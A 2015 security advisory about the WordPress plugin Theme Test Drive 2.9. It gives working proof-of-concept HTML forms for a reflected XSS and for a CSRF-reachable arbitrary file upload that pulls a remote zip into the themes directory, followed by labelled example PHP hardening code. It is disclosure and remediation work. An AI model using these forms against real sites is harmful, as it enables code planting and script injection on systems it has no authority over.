Subject: Arbitrary file upload and Reflected Cross-Site Scripting (XSS) in Theme Test Drive 2.9
Date: Thu, 20 Aug 2015 15:53:23 +0200

Hello,

Plugin: Theme Test Drive 2.9 https://wordpress.org/plugins/theme-test-drive/

1. Arbitrary file upload and Reflected Cross-Site Scripting (XSS)

Authenticated administrators can upload arbitrary files and inject arbitrary HTML/JS code (there is no CSRF protection, so the request can also be forged against a logged-in administrator).

Method: POST
URL: http://localhost/wp-admin/themes.php?page=themedrive_options_page
Vulnerable parameters: install_theme

Example PHP callstack (XSS):
themedrive_options_page   [/theme-test-drive/themedrive.php:396]
themedrive_handle_theme   [/theme-test-drive/themedrive.php:26]
themedrive_handle_theme_liberal   [/theme-test-drive/themedrive.php:66]


Verification (XSS):
--
<form method="POST" action="http://localhost/wp-admin/themes.php?page=themedrive_options_page">
<input type="text" name="theme_install" value='1' />
<input type="text" name="install_theme" value='<img src=x onerror=alert(1) />' />
<input type="submit" />
</form>
--

An attacker can also supply a valid zip file, which will be extracted to /wp-content/themes/.

Verification (uploading phpinfo.php):
--
<form method="POST" action="http://localhost/wp-admin/themes.php?page=themedrive_options_page">
<input type="text" name="theme_install" value='1' />
<input type="text" name="install_theme" value='http://cinu.pl/research/phpinfo.zip' />
<input type="submit" />
</form>
--
Then visit: http://localhost/wp-content/themes/phpinfo.php
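For reference, a hardened version of the install handler that closes both issues above (nonce-protected form, capability check, validated URL, escaped reflection, and extraction delegated to WordPress' own theme installer). This is an added example written for this advisory, not the plugin's code; the function names, the nonce action name and the form markup are assumptions.

```php
<?php
// Added, hypothetical hardening of the theme-install handler described above.
// Not the plugin's own code; function and nonce names are assumptions.

function themedrive_render_install_form_hardened() {
    // A nonce field ties the POST to this admin's session, defeating cross-site forgery.
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'themes.php?page=themedrive_options_page' ) ); ?>">
        <?php wp_nonce_field( 'themedrive_install_theme', 'themedrive_nonce' ); ?>
        <input type="hidden" name="theme_install" value="1" />
        <input type="text" name="install_theme" value="" />
        <input type="submit" value="Install" />
    </form>
    <?php
}

function themedrive_handle_install_hardened() {
    if ( empty( $_POST['theme_install'] ) ) {
        return;
    }
    // 1. Capability check, then nonce check: a forged request from an admin's browser stops here.
    if ( ! current_user_can( 'install_themes' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( 'themedrive_install_theme', 'themedrive_nonce' );

    // 2. Treat install_theme as untrusted: accept only an http(s) URL whose path ends in .zip.
    $raw  = isset( $_POST['install_theme'] ) ? wp_unslash( $_POST['install_theme'] ) : '';
    $url  = esc_url_raw( $raw, array( 'http', 'https' ) );
    $path = (string) parse_url( $url, PHP_URL_PATH );
    if ( '' === $url || ! preg_match( '#\.zip$#i', $path ) ) {
        // 3. Never echo the raw value back unescaped; esc_html() neutralises the reflected XSS.
        echo '<div class="error"><p>Invalid theme URL: ' . esc_html( $raw ) . '</p></div>';
        return;
    }

    // 4. Let Theme_Upgrader download, unpack and validate the archive (it requires a
    //    style.css theme header) instead of extracting directly into wp-content/themes/.
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    $upgrader = new Theme_Upgrader( new Automatic_Upgrader_Skin() );
    $result   = $upgrader->install( $url );
    if ( is_wp_error( $result ) ) {
        echo '<div class="error"><p>' . esc_html( $result->get_error_message() ) . '</p></div>';
    }
}
```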
--
Regards,
Marcin Probola,